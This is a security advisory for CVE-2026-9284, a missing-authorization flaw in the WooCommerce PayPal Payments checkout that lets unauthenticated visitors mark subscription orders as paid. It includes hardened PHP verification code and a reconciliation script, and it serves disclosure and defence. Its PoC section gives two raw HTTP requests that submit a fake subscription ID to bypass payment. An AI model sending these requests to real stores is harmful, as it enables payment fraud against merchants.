CVE-2026-9284 affects WooCommerce PayPal Payments and is a missing authorization issue in the subscription approval checkout flow. In vulnerable builds up to 4.0.1, a public WC-AJAX request can place a client-supplied PayPal subscription identifier into the WooCommerce session, and the subscriptions integration can later treat that session value as sufficient evidence to complete a WooCommerce order. On stores that use WooCommerce Subscriptions with PayPal subscription checkout, this can let an unauthenticated visitor move an order to a paid state without a successful PayPal capture or approval, which creates direct financial risk and unreliable payment records.
| Field | Value |
|---|---|
| CVE | CVE-2026-9284 |
| Plugin version | WooCommerce PayPal Payments up to 4.0.1, patched in 4.0.2 |
| All time | 25 781 378 |
| Active installations | 800 000+ |
| Publicly published | May 22, 2026 |
| Last updated | May 23, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://www.cve.org/CVERecord?id=CVE-2026-9284, https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-paypal-payments/woocommerce-paypal-payments-401-missing-authorization-to-unauthenticated-order-manipulation-and-information-disclosure |
Timeline
| Date | Event |
|---|---|
| February 18, 2026 | Plugin testing and vulnerability detection in WooCommerce PayPal Payments have been completed |
| February 18, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| May 22, 2026 | Published CVE-2026-9284 |
Discovery of the Vulnerability
The vulnerable surface is the public WC-AJAX checkout action ppc-approve-subscription. In the affected flow, the request body contains a subscription_id value supplied by the browser. Instead of proving that this value is a real PayPal subscription connected to the current checkout and customer session, the handler stores it in the WooCommerce session as ppcp_subscription_id. That session key is then consumed by the subscriptions integration as a signal that the subscription approval step has happened. When the later order creation path sees the value, it can call WC_Order::payment_complete() and skip the normal PayPal order processing path. The missing control is not only a nonce check: the server needs to bind the PayPal subscription, the WooCommerce order, and the current checkout session to each other, and verify the subscription's state at PayPal, before marking the order as paid.
Understanding of Missing Authorization attacks
Missing authorization in WordPress payment endpoints is especially dangerous because checkout flows often combine public AJAX routes, anonymous WooCommerce sessions, and high-trust state transitions. A route can be public for legitimate buyers and still require strict server-side authorization of every value that changes order state. Payment plugins should never treat client-supplied identifiers as proof of payment. PayPal order IDs, subscription IDs, approval flags, funding sources, and checkout context values must be resolved and validated on the server against the processor API and the WooCommerce order record. If that binding is skipped, an attacker can carry state between requests and make the store trust data that came from the attacker rather than from PayPal.
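The following is an added example of the server-side binding described above; it is not code from the WooCommerce PayPal Payments plugin or from the researcher. It handles the WC-AJAX action named in the advisory but assumes its own hook wiring, nonce action name, helper function names, a ppcp_order_id session key written by the earlier create-order step, option names for the PayPal REST credentials, and that the subscription was created with a custom_id referencing the checkout. Every name prefixed example_ is hypothetical.

```php
<?php
// Added example, not plugin code. Hook name, nonce action, helper names, the
// 'ppcp_order_id' session key, the option names and the custom_id binding are
// assumptions chosen to illustrate the checks the advisory calls for.

add_action( 'wc_ajax_ppc-approve-subscription', 'example_hardened_approve_subscription' );

function example_hardened_approve_subscription(): void {
	$body            = json_decode( (string) file_get_contents( 'php://input' ), true );
	$body            = is_array( $body ) ? $body : array();
	$subscription_id = sanitize_text_field( (string) ( $body['subscription_id'] ?? '' ) );
	$paypal_order_id = sanitize_text_field( (string) ( $body['order_id'] ?? '' ) );

	// A nonce limits cross-site request forgery; it says nothing about whether the
	// identifiers are genuine, so the checks below still run after it passes.
	if ( ! wp_verify_nonce( (string) ( $body['nonce'] ?? '' ), 'example_approve_subscription' ) ) {
		wp_send_json_error( array( 'message' => 'Invalid nonce.' ), 403 );
	}
	if ( '' === $subscription_id || '' === $paypal_order_id || ! WC()->session ) {
		wp_send_json_error( array( 'message' => 'Missing checkout context.' ), 400 );
	}

	// Bind to the checkout session: the PayPal order id must be the one this session
	// created in the earlier ppc-create-order step, not a value the client chose.
	$session_order_id = (string) WC()->session->get( 'ppcp_order_id', '' );
	if ( '' === $session_order_id || ! hash_equals( $session_order_id, $paypal_order_id ) ) {
		example_log_refusal( 'paypal order id does not match the checkout session', $subscription_id );
		wp_send_json_error( array( 'message' => 'Order context mismatch.' ), 403 );
	}

	// Resolve the subscription at PayPal instead of trusting the submitted id.
	$subscription = example_fetch_paypal_subscription( $subscription_id );
	if ( null === $subscription ) {
		example_log_refusal( 'subscription could not be resolved at PayPal', $subscription_id );
		wp_send_json_error( array( 'message' => 'Subscription not found.' ), 403 );
	}

	// The subscription must point back at this checkout (custom_id set when the
	// subscription was created: an assumption) and must already be approved.
	$bound    = hash_equals( $session_order_id, (string) ( $subscription['custom_id'] ?? '' ) );
	$approved = 'ACTIVE' === ( $subscription['status'] ?? '' );
	if ( ! $bound || ! $approved ) {
		example_log_refusal( 'subscription not bound to this checkout or not ACTIVE', $subscription_id );
		wp_send_json_error( array( 'message' => 'Subscription not approved.' ), 403 );
	}

	// Only a verified id reaches the session; the order completion path should
	// repeat the PayPal status check before calling WC_Order::payment_complete().
	WC()->session->set( 'ppcp_subscription_id', $subscription_id );
	wp_send_json_success( array( 'subscription_id' => $subscription_id ) );
}

function example_fetch_paypal_subscription( string $subscription_id ): ?array {
	// GET /v1/billing/subscriptions/{id} from PayPal's Subscriptions REST API.
	$response = wp_remote_get(
		'https://api-m.paypal.com/v1/billing/subscriptions/' . rawurlencode( $subscription_id ),
		array(
			'headers' => array( 'Authorization' => 'Bearer ' . example_paypal_access_token() ),
			'timeout' => 15,
		)
	);
	if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
		return null;
	}
	$data = json_decode( wp_remote_retrieve_body( $response ), true );
	return is_array( $data ) ? $data : null;
}

function example_paypal_access_token(): string {
	// Client-credentials grant against PayPal's OAuth endpoint; the option names
	// holding the REST credentials are assumptions.
	$credentials = get_option( 'example_ppcp_client_id' ) . ':' . get_option( 'example_ppcp_client_secret' );
	$response    = wp_remote_post(
		'https://api-m.paypal.com/v1/oauth2/token',
		array(
			'headers' => array(
				'Authorization' => 'Basic ' . base64_encode( $credentials ),
				'Content-Type'  => 'application/x-www-form-urlencoded',
			),
			'body'    => 'grant_type=client_credentials',
			'timeout' => 15,
		)
	);
	$data = is_wp_error( $response ) ? null : json_decode( wp_remote_retrieve_body( $response ), true );
	return is_array( $data ) ? (string) ( $data['access_token'] ?? '' ) : '';
}

function example_log_refusal( string $reason, string $subscription_id ): void {
	// Every refused completion is logged so administrators can reconcile later.
	wc_get_logger()->warning(
		'Subscription approval refused: ' . $reason,
		array( 'source' => 'example-ppcp-hardening', 'subscription_id' => $subscription_id )
	);
}
```

The order of checks matters: the session binding is tested before any network call so an arbitrary subscription_id never triggers a PayPal lookup, and the session is only written after PayPal has confirmed both the status and the link to this checkout. The live-API host is used here; a sandbox deployment would point both URLs at api-m.sandbox.paypal.com.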
Exploiting the Missing Authorization Vulnerability
To reproduce CVE-2026-9284 in a controlled lab store, the attacker does not need a WordPress account. The first request creates a PayPal order context for checkout. The second request sends any non-empty subscription_id to the subscription approval endpoint and asks the plugin to create the WooCommerce order. In vulnerable configurations with WooCommerce Subscriptions active, this can leave the WooCommerce order in a paid state even though the PayPal capture or approval did not succeed.
POC:
```http
POST /?wc-ajax=ppc-create-order HTTP/2
Host: target.example
Cookie: any WooCommerce session, or no authenticated account
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Referer: https://target.example/checkout/
Content-Type: application/json
Content-Length: 43
Origin: https://target.example
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"nonce":"PayPalCommerceGateway.ajax.create_order.nonce ","context":"checkout"}


POST /?wc-ajax=ppc-approve-subscription HTTP/2
Host: target.example
Cookie: any WooCommerce session, or no authenticated account
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Referer: https://target.example/checkout/
Content-Type: application/json
Content-Length: 169
Origin: https://target.example
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

{"nonce":"PayPalCommerceGateway.ajax.approve_subscription.nonce ","order_id":"6M3148632V5656017","subscription_id":"FAKE-SUBSCRIPTION-ID","funding_source":"paypal","should_create_wc_order":true}
```
The practical impact is payment bypass. A shop can ship goods, grant digital access, or activate a subscription because WooCommerce sees a completed payment state while PayPal has not captured funds. The issue also damages accounting data because the WooCommerce order history no longer matches the processor record. For stores that sell subscriptions, memberships, downloadable products, or services with automatic provisioning, that mismatch can create immediate loss and later reconciliation work for administrators.
Recommendations for Improved Security
Site owners should update WooCommerce PayPal Payments to version 4.0.2 or newer. If immediate updating is not possible, subscription checkout through PayPal should be disabled until the patched version is deployed, and recent orders should be reconciled against PayPal records. Developers should validate every PayPal subscription identifier server-side, bind it to the current WooCommerce order and checkout session, and require a confirmed PayPal status before calling WC_Order::payment_complete(). A nonce can reduce cross-site request risk, but it cannot replace authorization, ownership checks, and payment processor verification. Logging should also record when a payment completion path is skipped or when PayPal state cannot be confirmed.
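The reconciliation step recommended above, as an added example that is not part of the advisory or the plugin. It runs offline as plain PHP over two constructed record sets standing in for a WooCommerce order export and PayPal's subscription data; the field names, statuses and identifiers are assumptions, and the FAKE-SUBSCRIPTION-ID row mirrors the kind of value the PoC submits. Orders the store treats as paid are flagged when PayPal has no matching record, the subscription is not ACTIVE, or the subscription belongs to a different order.

```php
<?php
// Added example, not advisory or plugin code. Both record sets are constructed
// samples; in practice they come from a WooCommerce order export and from
// PayPal's subscription data. Field names are assumptions.

// WooCommerce orders and the subscription id each one recorded at checkout.
$wc_orders = array(
	array( 'order_id' => 1001, 'status' => 'processing', 'paypal_subscription_id' => 'I-2XAMPLE00001', 'total' => '29.00' ),
	array( 'order_id' => 1002, 'status' => 'completed',  'paypal_subscription_id' => 'I-2XAMPLE00002', 'total' => '29.00' ),
	array( 'order_id' => 1003, 'status' => 'processing', 'paypal_subscription_id' => 'FAKE-SUBSCRIPTION-ID', 'total' => '99.00' ),
	array( 'order_id' => 1004, 'status' => 'completed',  'paypal_subscription_id' => 'I-2XAMPLE00001', 'total' => '29.00' ),
	array( 'order_id' => 1005, 'status' => 'pending',    'paypal_subscription_id' => '', 'total' => '15.00' ),
);

// What PayPal knows: subscription status and the order it was created for
// (custom_id set at creation, an assumption about the integration).
$paypal_subscriptions = array(
	'I-2XAMPLE00001' => array( 'status' => 'ACTIVE',           'custom_id' => '1001' ),
	'I-2XAMPLE00002' => array( 'status' => 'APPROVAL_PENDING', 'custom_id' => '1002' ),
);

// WooCommerce statuses that mean the store considers the order paid.
$paid_statuses = array( 'processing', 'completed' );

function reconcile_orders( array $orders, array $subscriptions, array $paid_statuses ): array {
	$findings = array();
	foreach ( $orders as $order ) {
		if ( ! in_array( $order['status'], $paid_statuses, true ) ) {
			continue; // an unpaid order cannot be a payment bypass
		}
		$sub_id = (string) $order['paypal_subscription_id'];
		if ( '' === $sub_id || ! isset( $subscriptions[ $sub_id ] ) ) {
			$findings[] = array(
				'order_id' => $order['order_id'],
				'reason'   => 'no PayPal subscription record for "' . $sub_id . '"',
			);
			continue;
		}
		$sub = $subscriptions[ $sub_id ];
		if ( 'ACTIVE' !== $sub['status'] ) {
			$findings[] = array(
				'order_id' => $order['order_id'],
				'reason'   => 'subscription status is ' . $sub['status'],
			);
			continue;
		}
		if ( (string) $order['order_id'] !== (string) $sub['custom_id'] ) {
			$findings[] = array(
				'order_id' => $order['order_id'],
				'reason'   => 'subscription belongs to order ' . $sub['custom_id'],
			);
		}
	}
	return $findings;
}

foreach ( reconcile_orders( $wc_orders, $paypal_subscriptions, $paid_statuses ) as $finding ) {
	printf( "order %d is marked paid but unverified: %s\n", $finding['order_id'], $finding['reason'] );
}
```

With the sample data, orders 1003, 1002 and 1004 are reported (unknown id, pending approval, and an ACTIVE subscription reused from another order), while 1001 passes and the pending order 1005 is skipped. The third check is the one most easily forgotten: a real, active subscription identifier still does not justify a second paid order.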
By addressing missing authorization in payment AJAX workflows like CVE-2026-9284, WordPress store owners reduce payment bypass risk and keep order records aligned with real processor state. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuthorization #WooCommerceSecurity #PaymentSecurity #HighVulnerability
